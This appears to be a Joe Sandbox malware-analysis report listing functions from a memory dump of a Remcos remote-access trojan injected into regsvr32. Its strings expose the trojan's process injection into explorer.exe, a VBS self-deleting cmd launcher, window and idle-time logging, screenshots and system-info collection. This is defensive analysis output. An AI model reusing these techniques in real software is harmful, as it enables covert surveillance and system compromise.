                                      Function 02A55BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A558A9: CreateFileW.KERNEL32(00000000,00000000,?,02A55C84,?,?,00000000,?,02A55C84,00000000,0000000C), ref: 02A558C6
                                      • GetLastError.KERNEL32 ref: 02A55CEF
                                      • __dosmaperr.LIBCMT ref: 02A55CF6
                                      • GetFileType.KERNEL32(00000000), ref: 02A55D02
                                      • GetLastError.KERNEL32 ref: 02A55D0C
                                      • __dosmaperr.LIBCMT ref: 02A55D15
                                      • CloseHandle.KERNEL32(00000000), ref: 02A55D35
                                      • CloseHandle.KERNEL32(?), ref: 02A55E7F
                                      • GetLastError.KERNEL32 ref: 02A55EB1
                                      • __dosmaperr.LIBCMT ref: 02A55EB8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: 02a9d59b57c47b4d4687004fb0ae09e78f4b156d2c385bbfd14d87c3e5082216
                                      • Instruction ID: e2a9438285a2409cad6a9c219ebd6696eced6b58ed86ff7fa4c0dbda907fdb76
                                      • Opcode Fuzzy Hash: 02a9d59b57c47b4d4687004fb0ae09e78f4b156d2c385bbfd14d87c3e5082216
                                      • Instruction Fuzzy Hash: B9A11132E142689FDF199F68DC91BAF7BA1EB06324F184159EC119B290DF358822CB91
                                      Function 02A0F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,02A750E4,?,02A75338), ref: 02A0F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,02A75338), ref: 02A0F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02A0F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02A0F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,02A75338), ref: 02A0F563
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02A1C1F5
                                        • Part of subcall function 02A1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02A1C208
                                      • CloseHandle.KERNEL32(00000000,?,02A75338), ref: 02A0F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      • Opcode ID: add95248af5e8154acbd4dca437f8521a90ebafdbf2b86123043ad52456eb482
                                      • Instruction ID: 861ecd1dcad6edbfe2ef3d270e37596f2301e3f88ff8f56f1603fb97ad8f02e1
                                      • Opcode Fuzzy Hash: add95248af5e8154acbd4dca437f8521a90ebafdbf2b86123043ad52456eb482
                                      • Instruction Fuzzy Hash: BD713F305883419FD724EB60E9D49EEB7A6BF94354F40081EE58A931E1EF34A90ECF52
                                      Function 02A14BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 65535$udp
                                      • API String ID: 0-1267037602
                                      • Opcode ID: 77e303b7381ec5caf79144a0857e50f78b0c32109c10a2f2d1bcbc91f696f612
                                      • Instruction ID: 7b10cc35c43ab6c528eaec4ab9b87329f82cbd5c6c72c7ac80836698f77ebe0f
                                      • Opcode Fuzzy Hash: 77e303b7381ec5caf79144a0857e50f78b0c32109c10a2f2d1bcbc91f696f612
                                      • Instruction Fuzzy Hash: 8051F7756493119FDB209B6CC944B3B77F4AF8CB79F08082DF88597290EF65C840C662
                                      Function 02A0ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02A0AD38
                                      • Sleep.KERNEL32(000001F4), ref: 02A0AD43
                                      • GetForegroundWindow.USER32 ref: 02A0AD49
                                      • GetWindowTextLengthW.USER32(00000000), ref: 02A0AD52
                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02A0AD86
                                      • Sleep.KERNEL32(000003E8), ref: 02A0AE54
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                      • String ID: [${ User has been idle for $ minutes }$]
                                      • API String ID: 911427763-3954389425
                                      • Opcode ID: eb52c346e9685620d0252b8c8ae3d5b6dde0c74bf772bcdc75a104d01ebeeea0
                                      • Instruction ID: b15ee35ecd2030a0f20218456c1098d70f2934d588959ca88fee2c28b9e3771c
                                      • Opcode Fuzzy Hash: eb52c346e9685620d0252b8c8ae3d5b6dde0c74bf772bcdc75a104d01ebeeea0
                                      • Instruction Fuzzy Hash: AD51E3316843519BD314FB20FAD4BBF77ABAB88718F40092AF586861D1DF24D945CE92
                                      Function 02A0D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A12850: TerminateProcess.KERNEL32(00000000,?,02A0D80F), ref: 02A12860
                                        • Part of subcall function 02A12850: WaitForSingleObject.KERNEL32(000000FF,?,02A0D80F), ref: 02A12873
                                        • Part of subcall function 02A136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 02A13714
                                        • Part of subcall function 02A136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 02A1372D
                                        • Part of subcall function 02A136F8: RegCloseKey.ADVAPI32(?), ref: 02A13738
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02A0D859
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,02A66468,02A66468,00000000), ref: 02A0D9B8
                                      • ExitProcess.KERNEL32 ref: 02A0D9C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                      • API String ID: 1913171305-2411266221
                                      • Opcode ID: 03eb00c68c4676221b762e414ffdb26305d2cd82e3188910f49af11dab5c90ab
                                      • Instruction ID: e322bd114087a910609f0877b090eac44d8aa9d80986ef81c667b989bbf0e379
                                      • Opcode Fuzzy Hash: 03eb00c68c4676221b762e414ffdb26305d2cd82e3188910f49af11dab5c90ab
                                      • Instruction Fuzzy Hash: 92414A32D901186ADB15FBA0EDD4DFEB77ABF54710F40006BA10AA70E5EF205E4ACE90
                                      Function 02A0DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02A0DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: daf9fc275ee9ba27768cc758312b8688391245f6f998ba9bf1bd1ee44f90d4cc
                                      • Instruction ID: 40bd6c728db13f355361326fbacd023cf8b82b441b76e18b4877bf9f9a2641d1
                                      • Opcode Fuzzy Hash: daf9fc275ee9ba27768cc758312b8688391245f6f998ba9bf1bd1ee44f90d4cc
                                      • Instruction Fuzzy Hash: 35412F72188200AAE215FB60FED5CBEB7EAFE91755F00051FB546920E0EF609E49CA52
                                      Function 02A3A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A892
                                      • GetLastError.KERNEL32(?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A89F
                                      • __dosmaperr.LIBCMT ref: 02A3A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A8D2
                                      • GetLastError.KERNEL32(?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A8DC
                                      • __dosmaperr.LIBCMT ref: 02A3A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02A01D55,?), ref: 02A3A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A930
                                      • __dosmaperr.LIBCMT ref: 02A3A937
                                      • _free.LIBCMT ref: 02A3A943
                                      • _free.LIBCMT ref: 02A3A94A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 6bda4f4f8e7df6e1ea32e3e9b0a97ad9dd2526c0a64e295d2ae306c83fff5d91
                                      • Instruction ID: 07c80c5bcb149cfee7d26739f165f9a92c1d8fdbf4ce60c8fec103423f74109c
                                      • Opcode Fuzzy Hash: 6bda4f4f8e7df6e1ea32e3e9b0a97ad9dd2526c0a64e295d2ae306c83fff5d91
                                      • Instruction Fuzzy Hash: EF31AE7280422AEBDF12AFA4CC84DAF7B6DEF45364F104258F9606A191DF31C952DBA0
                                      Function 02A19627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: b066abff0cc2798351d8fb7f03b8c93088491d65de77dbea051688a2f2a8ef93
                                      • Instruction ID: 52157ba64f86feaef6ccc9c6135c23c0a292e4bdb421fc51b2279a2e483f4e7a
                                      • Opcode Fuzzy Hash: b066abff0cc2798351d8fb7f03b8c93088491d65de77dbea051688a2f2a8ef93
                                      • Instruction Fuzzy Hash: 21719F709883029FD304EF21E8A0BAB7BA5AF85320F44491DF5A2571D0DF74AA4CCF92
                                      Function 02A054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02A054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A0556F
                                      • TranslateMessage.USER32(?), ref: 02A0557E
                                      • DispatchMessageA.USER32(?), ref: 02A05589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02A74F78), ref: 02A05641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02A05679
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 14f5d239cb4a06e1f6303138e6e2e2d70a9cfa211a07de34d24569b380520385
                                      • Instruction ID: 93969cf134cd66ae9ca5a19f7629164e76029c7225d6771a24745f616da509b2
                                      • Opcode Fuzzy Hash: 14f5d239cb4a06e1f6303138e6e2e2d70a9cfa211a07de34d24569b380520385
                                      • Instruction Fuzzy Hash: 4541C531A84301ABDB14FB74EDD89AF77AAAB85710F80091DE916875C0DF34D916CF91
                                      Function 02A132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02A13417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02A13425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 02A13432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 02A13452
                                      • CloseHandle.KERNEL32(00000000), ref: 02A1345F
                                      • CloseHandle.KERNEL32(?), ref: 02A13465
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: fe930d3febd67c1734bcb2b60e53fa130be3cf196d4e12960d90016ad14658c1
                                      • Instruction ID: e43a7df0f0980aeac5e78c2d23e52d9f6002ccc721f4d87b83143da42826304b
                                      • Opcode Fuzzy Hash: fe930d3febd67c1734bcb2b60e53fa130be3cf196d4e12960d90016ad14658c1
                                      • Instruction Fuzzy Hash: 1A41F131688301BBDB119F25EC89F6B7BADEFC4768F100999F644DA090DF30C405CA6A
                                      Function 02A1AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB63
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 58a09e55e88c9a02a69c07207930b68c7488d44ed47fb629162ee4c1b7647600
                                      • Instruction ID: 6f95896d826bc987db266f8410f1538450f9a0817fb68b63e3603817d9239bbd
                                      • Opcode Fuzzy Hash: 58a09e55e88c9a02a69c07207930b68c7488d44ed47fb629162ee4c1b7647600
                                      • Instruction Fuzzy Hash: 3211CE71D8122AAB9721AB64ECC8DFF3B7DDF42361B000816FA0996041DF648D06EAE1
                                      Function 02A48121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02A48135
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A48141
                                      • _free.LIBCMT ref: 02A4814C
                                      • _free.LIBCMT ref: 02A48157
                                      • _free.LIBCMT ref: 02A48162
                                      • _free.LIBCMT ref: 02A4816D
                                      • _free.LIBCMT ref: 02A48178
                                      • _free.LIBCMT ref: 02A48183
                                      • _free.LIBCMT ref: 02A4818E
                                      • _free.LIBCMT ref: 02A4819C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 3349c83891f388ffee49df301a5ffca5e1db98efece87d43e34d83ac19a9e44d
                                      • Instruction ID: 69d43a46447f82b85024772e5669d7605e5cbd7b97028d5dcc032ed0be98702f
                                      • Opcode Fuzzy Hash: 3349c83891f388ffee49df301a5ffca5e1db98efece87d43e34d83ac19a9e44d
                                      • Instruction Fuzzy Hash: E011A27A540108EFCB01EF94CA80CD93BAAFF85755B4541A5BA588F221DE32EF509FC0
                                      Function 02A19FB4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A19FB9
                                      • GdiplusStartup.GDIPLUS(02A74ACC,?,00000000), ref: 02A19FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02A1A077
                                      • Sleep.KERNEL32(000003E8), ref: 02A1A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 02A1A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02A1A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                      • API String ID: 489098229-3790400642
                                      • Opcode ID: bddc486ac2bbe7d33c40ca48356c2628ca49c0b796a1412bd8ad597ca66976dc
                                      • Instruction ID: 05ab43e1e9e85fcf26bac60807cb072a6b1e15ebdf346af787d1b7b6d0b6f262
                                      • Opcode Fuzzy Hash: bddc486ac2bbe7d33c40ca48356c2628ca49c0b796a1412bd8ad597ca66976dc
                                      • Instruction Fuzzy Hash: A0518071E802159ADB14FBB4ED94AFEBBBAAF44310F40001AE509AB1C1EF749D49CF50
                                      Function 02A55F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02A56FFF), ref: 02A55F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 32b6d1693496f20daceb825b2b9e8e6e300ff6669a41dbfd6b8a242d073fc30c
                                      • Instruction ID: b8588c7f37974d90eaa544dc58c7e504c41f50ff1e676e7fe5a1b93f228a9f7a
                                      • Opcode Fuzzy Hash: 32b6d1693496f20daceb825b2b9e8e6e300ff6669a41dbfd6b8a242d073fc30c
                                      • Instruction Fuzzy Hash: AB51617090052ACBCF14DF68EA8C5BEBBB8FF49714F948185D841A7254CF319968CB19
                                      Function 02A17495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02A174F5
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • Sleep.KERNEL32(00000064), ref: 02A17521
                                      • DeleteFileW.KERNEL32(00000000), ref: 02A17555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 8855a23e6480e19e7e4f28d5032c8851f53ccd0cdaf1ad968f2d38115df47ef6
                                      • Instruction ID: dcfd28afa80f314bcdb5d54323a31413f12fbf5da5baf89d53badb547464fc82
                                      • Opcode Fuzzy Hash: 8855a23e6480e19e7e4f28d5032c8851f53ccd0cdaf1ad968f2d38115df47ef6
                                      • Instruction Fuzzy Hash: 63317471980219AADB04FBA0FED5DFEB77AAF14314F40055AD50A670D0EF605E8ACE94
                                      Function 02A073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(02A72B14,00000000,02A752D8,00003000,00000004,00000000,00000001), ref: 02A073DD
                                      • GetCurrentProcess.KERNEL32(02A72B14,00000000,00008000,?,00000000,00000001,00000000,02A07656,C:\Windows\SysWOW64\regsvr32.exe), ref: 02A0749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: e43a2ec7d2316eb6177c83d014884c9e840b21bbfadac6076296bd1ab2b22047
                                      • Instruction ID: c5a452a2a11bc2a8bde4d36c79b541c77ced715c94a7fe7e8c054c68f424a7ad
                                      • Opcode Fuzzy Hash: e43a2ec7d2316eb6177c83d014884c9e840b21bbfadac6076296bd1ab2b22047
                                      • Instruction Fuzzy Hash: 6D317271E80301ABE321EF74ED89F66B7B9BB48701F100824FA1196681DF75E8198B65
                                      Function 02A1D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02A1D476
                                        • Part of subcall function 02A1D50F: RegisterClassExA.USER32(00000030), ref: 02A1D55B
                                        • Part of subcall function 02A1D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02A1D576
                                        • Part of subcall function 02A1D50F: GetLastError.KERNEL32 ref: 02A1D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02A1D4AD
                                      • lstrcpynA.KERNEL32(02A74B60,Remcos,00000080), ref: 02A1D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,02A74B48), ref: 02A1D4DD
                                      • TranslateMessage.USER32(?), ref: 02A1D4E9
                                      • DispatchMessageA.USER32(?), ref: 02A1D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A1D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: 16eda2cb3a677dd06f2450a3ccf50dff63ce363a690f761feba297735712cd2e
                                      • Instruction ID: 3e1b83ce368c1a897a91c3aab235659869e22c5e9eaf6fe9a43d033a561b2e89
                                      • Opcode Fuzzy Hash: 16eda2cb3a677dd06f2450a3ccf50dff63ce363a690f761feba297735712cd2e
                                      • Instruction Fuzzy Hash: E7012E75C80255EBE7109FA5EC4DF9BBB7CBB85714F004459F61187080DF78986ACB94
                                      Function 02A4CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49f106b45ff2df0520e9fbad24bd9bd28b6f1d49faeb95ad473cd6d5fd7794a6
                                      • Instruction ID: 17a22a4d000b29e6738b65424966535063ee966ac251f79013cdd38cbf0d3216
                                      • Opcode Fuzzy Hash: 49f106b45ff2df0520e9fbad24bd9bd28b6f1d49faeb95ad473cd6d5fd7794a6
                                      • Instruction Fuzzy Hash: 23C1E370E44349AFCB11DFACC880BADBBB6AF89314F14455AE915AB281CF34D946CF61
                                      Function 02A53D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?), ref: 02A53E2F
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02A53EB2
                                      • __alloca_probe_16.LIBCMT ref: 02A53EEA
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A53F45
                                      • __alloca_probe_16.LIBCMT ref: 02A53F94
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02A53F5C
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A53FD8
                                      • __freea.LIBCMT ref: 02A54003
                                      • __freea.LIBCMT ref: 02A5400F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
